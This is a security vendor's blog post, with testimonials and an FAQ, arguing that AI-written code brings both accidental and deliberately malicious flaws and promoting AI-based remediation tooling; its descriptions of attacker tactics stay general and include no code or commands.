Skip to content

AI vs AI, Part II: Code Is a Battlefield

Ali Mesdaq 3 Min Read
AI vs AI, Part II: Code Is a Battlefield

Security teams today find themselves fighting on two fronts in the AI war.

As we talked about in our previous blog, developers frequently unintentionally write vulnerable code—and so, in turn, do LLMs and AI-powered tools. This problem won’t go away any time soon, because the models themselves are trained on high volumes of messy, real-life code with real-life flaws.

When developers use AI to write code, it might solve the problem they asked the model to solve, but it may also add security flaws. As code velocity accelerates from AI augmentation, security issues can start piling up. What’s more, it’s possible that literally no one alive has really thought about how that code works, or how to fix it.

And that’s when everyone is doing their best, trying to commit good code! These developers aren’t trying to take part in a pitched battle with security; the situation arises only due to the unintended limitations of the models and developers.

So here’s an even thornier question: what happens when threat actors start using AI to create deliberately malicious code? That’s the second front in the AI vs. AI code war—security vs. threat actors.

Code Red: When Threat Actors Use AI

Attackers saw AI as a massive boon from the beginning, and security researchers have started to understand the full extent of the threat.

Here are a few of the ways threat actors and security researchers can use AI to launch attacks:

  1. Malicious code obfuscation: If a rogue developer in your organization wants to commit code that deliberately exfiltrates data or creates a backdoor, GenAI can generate complex but irrelevant code to hide the true purpose of the malicious code.
  2. Hiding secrets in plain sight: An insider threat could deliberately include hard-coded credentials and other secrets in the code base, allowing authentication bypasses and evasion of existing security controls.
  3. LLM hijacking: Researchers recently showed that attackers can poison training data sets for LLMs in ways that lead them to create malicious code, which could then be adopted by developers for use in your code base.
  4. Deliberately insecure defaults: We all know that many users never change configurations from defaults—so if a developer uses GenAI to code a deliberately insecure default configuration, the resulting security hole could have a big impact.

Fighting Fire with Fire: AI For the Good Guys

As you can see, malicious insiders can use AI to attack from a number of angles. For companies working in sensitive industries or with valuable data, GenAI creates an urgent need for a comprehensive security strategy to stop serious—even existential—threats from entering your code base.

The only way to detect these AI-created issues will be AI-based security software, built to see the real-world ways that AI threats manifest in application code. Since code’s being created faster than ever, it’s even more important to use security tooling with automated fixes that can stop attackers from using the flaws they’ve deliberately introduced.

Subscribe to Amplify Weekly Blog Roundup

Subscribe Here!

See What Experts Are Saying

BOOK A DEMO arrow-btn-white
By far the biggest and most important problem in AppSec today is vulnerability remediation. Amplify Security’s technology automatically fixes vulnerable code for developers at scale is the solution we’ve been waiting decades for.
strike-read jeremiah-grossman-01

Jeremiah Grossman

Founder | Investor | Advisor
As a security company we need to be secure, Amplify helped us achieve that without slowing down our developers
seclytic-logo-1 Saeed Abu-Nimeh, Founder @ SecLytics

Saeed Abu-Nimeh

CEO and Founder @ SecLytics
Amplify is working on making it easier to empower developers to fix security issues, that is a problem worth working on.
Kathy Wang

Kathy Wang

CISO | Investor | Advisor
If you want all your developers to be secure, then you need to secure the code for them. That's why I believe in Amplify's mission
strike-read Alex Lanstein

Alex Lanstein

Chief Evangelist @ StrikeReady

Frequently
Asked Questions

What is vulnerability management, and why is it important?

Vulnerability management is a systematic approach to managing security risks in software and systems by prioritizing risks, defining clear paths to remediation, and ultimately preventing and reducing software risks over time.

Why is vulnerability management important?

Without a sound vulnerability management program, organizations often face a backlog of undifferentiated security alerts, leading to inefficient use of resources and oversight of critical software risks.

What makes vulnerability management extremely challenging in today’s high-growth environment?

Vulnerability management faces challenges from the complexity and dynamism of software environments, often leading to an overwhelming number of security findings, rapid technological advancements, and limited resources to thoroughly explore appropriate solutions.

How can Amplify help me with vulnerability management?

Amplify automates repetitive and time-consuming tasks in vulnerability management, such as risk prioritization, context enrichment, and providing remediations for security findings from static (SAST) application security tools.

What technology does the Amplify platform integrate with?

Amplify integrates with hosted code repositories such as GitHub or GitLab, as well as various security tools.

Have a
Questions?

Contact Us arrow-btn-white

Ready to
Get started?

Book A GUIDED DEMO arrow-purple